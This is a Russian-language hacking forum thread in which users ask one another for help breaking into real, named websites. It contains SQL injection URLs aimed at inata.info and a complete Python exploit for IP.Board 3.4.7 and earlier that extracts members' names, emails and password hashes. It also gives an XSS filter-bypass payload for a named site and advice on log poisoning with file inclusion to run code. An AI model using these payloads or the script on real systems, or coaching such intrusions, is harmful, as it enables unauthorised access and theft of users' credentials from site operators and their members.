Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Ruslord1

    Ruslord1 New Member

    Joined:
    20 Dec 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    такой сверхуязвимости я еще не встречал )
     
  2. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Просто внедрение html в страницу
     
  3. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Добрый вечер!)

    Парни, явно нащупал скулю на сайте, а развить никак не получается, застрял в самом начале o_O
    http://inata.info/realty/rent/11+order+by+11--/

    Но при составлении запроса
    http://inata.info/realty/rent/11+UnIOn+sELeCt+1,2,3,4,5,6,7,8,9,10,11--/
    DB query error.
    Please try later.


    Как только не крутил, не раскручивается. Это видимо некий мод в Битрикс, я посмотрел, что Битрикс может работать как с MySQL так и с Oracle, пробовал итак итак никак. Я так понимаю вопрос в самих union select, видимо фильтр какой то. Пытался по статьям обойти, никаких результатов.

    Благодарю!)
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    http://inata.info/realty/rent/11+group+by+63/ - true
    на union похоже фильтр стоит, как вариант крутить блинд:
    http://inata.info/realty/rent/11+and(SUBSTRING((SELECT+version()),1,1))=5+--+/

    При таком запросе ошибка пропадает, но вывода не нашел, возможно в какой-то из колонок нужно корректный параметр поставить:
    http://inata.info/realty/rent/11+and+1=0+uNiON sELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63+--+/
     
    _________________________
    #1004 winstrool, 14 Jan 2016
    Last edited: 14 Jan 2016
    ArmusIAm likes this.
  5. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Спасибо!
    А в чем преимущество данного запроса? Я так понял, единственное отличие, знак конца строки - %0a. Но после него, что не пиши, сервер не выводит ни объект недвижимости, ни ошибку, даже если кавычку поставить. Что он делает в рамках инъекции? И что ты имеешь ввиду под корректным параметром?

    Извини за такое кол-во вопросов, но хочется именно понимать, а не просто взломать. Буду очень признателен);)
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    В общем пытаюсь взломать движок IPB
    С помощью эксплоита как называется эксплоит не знаю но нашёл на форуме "IPB версии 3.4.7 и меньше"
    Там скрипт. при запуски скрипта у меня вылетает ошибка
    Мне интересно с чем она связана
    Вставлял разные сайты
    Скрипт такой
    #!/usr/bin/env python
    # Sunday, November 09, 2014 - secthrowaway () safe-mail net
    # IP.Board <= 3.4.7 SQLi (blind, error based);
    # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable url = 'http://адрес_форума/' ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re # <socks> - http://sourceforge.net/projects/socksipy/
    #import socks, socket
    #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
    #socket.socket = socks.socksocket
    # </socks> import urllib2, urllib

    def inject(sql):
    try: urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e:
    if e.code == 503: data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
    if txt is not None:
    return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
    return inject(sqli)
    else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
    return r

    n = inject('SELECT COUNT(*) FROM members')
    print '* Found %s users' % n for j in range(int(n)):
    print get('member_id', 'members', j)
    print get('name', 'members', j)
    print get('email', 'members', j)
    print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
    print '----------------'

    [​IMG]
     
    #1006 Sensoft, 16 Jan 2016
    Last edited: 16 Jan 2016
  7. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    По ошибке видно что есть внедрение в insert запрос проверьте фильтрацию кавычек если отсутствует то можно крутить как error based
     
  8. compass

    compass Banned

    Joined:
    9 Jan 2016
    Messages:
    101
    Likes Received:
    10
    Reputations:
    0
    Возможно ли обойти двухфакторную аутентификацию?
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Да
     
    _________________________
    grimnir likes this.
  10. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    всем привет,подскажите как правильно подставить запрос,

    если быстро 2 раза нажать на ссылку получить кошель blockchain

    A Database Error Occurred

    Error Number: 1062

    Duplicate entry 'hahaha_10056' for key 'id_user'

    INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');

    Filename: /home/misterbit/public_html/modules/wallet/controllers/wallet.php

    Line Number: 137

    сайт Query
     
  11. ol1ver

    ol1ver Active Member

    Joined:
    22 Jul 2011
    Messages:
    237
    Likes Received:
    155
    Reputations:
    0
    Приветствую.
    Чекаю на sql inj. сайт.
    Вставляю payload в cookie, сайт - интернет магазин, идентификатор пользователя хранится в cookie переменной (её и чекаю)
    Если переменная(идентиф-р) не найден корзина пишет - You have no items.
    Сейчас заметил что payload вида...
    канает т.к вывел товары - не фильтрует подумал я.
    Как можно раскачать и вывести что мне надо?

    Cпасибо!
     
  12. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.

    hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.




    Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind
     
    #1012 ArmusIAm, 18 Jan 2016
    Last edited: 18 Jan 2016
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Если раскрутить уязвимый параметр, то можно крутить как Error-Based
     
    _________________________
    madam and ArmusIAm like this.
  14. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    hahaha_10056 это имя базы данных
     
  15. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Сомневаюсь
    По крайней мере в данном случае hahaha_10056 запишется в поле id_user таблицы leadercoin_address в некой базе данных.
     
  16. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?
    [​IMG]
     
  17. Kolyan333

    Kolyan333 New Member

    Joined:
    2 May 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Всем привет, помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример <script>, а если поставить пробел < script> то оставляет, но не смог выполнить алерт никак
     
  18. PulsarEX547

    PulsarEX547 New Member

    Joined:
    18 Jan 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    #1018 PulsarEX547, 18 Jan 2016
    Last edited: 18 Jan 2016
  19. ArmusIAm

    ArmusIAm New Member

    Joined:
    8 Jan 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    <IMG SRC="javascript:aLeRt('message')"> попробуй так

    Не знаю что за ошибка, но по крайней мере в 19 строчке происходит запись в файл, можно попробовать поиграть с $_SERVER переменными (записать туда PHP код, который он запишет в лог файл, а потом подключить его инклудом если LFI есть)
    Не могу сказать, прокатит или нет, но имя файла для хранения лога хранится в $file_log, есть вероятность что и ее можно подменить и сохранить лог куда тебе удобно)
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    INSERT INTO `leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');
    в данном моменте leadercoin_address является таблицей в текущей БД.

    $file_log, в какой файл пишет? и что в начале файла прописано? есть ли что нить типо die() или exit() в начале файла?

    в выводимое поле вставте вот это:
     
    _________________________
    #1020 winstrool, 18 Jan 2016
    Last edited: 18 Jan 2016
    PulsarEX547 likes this.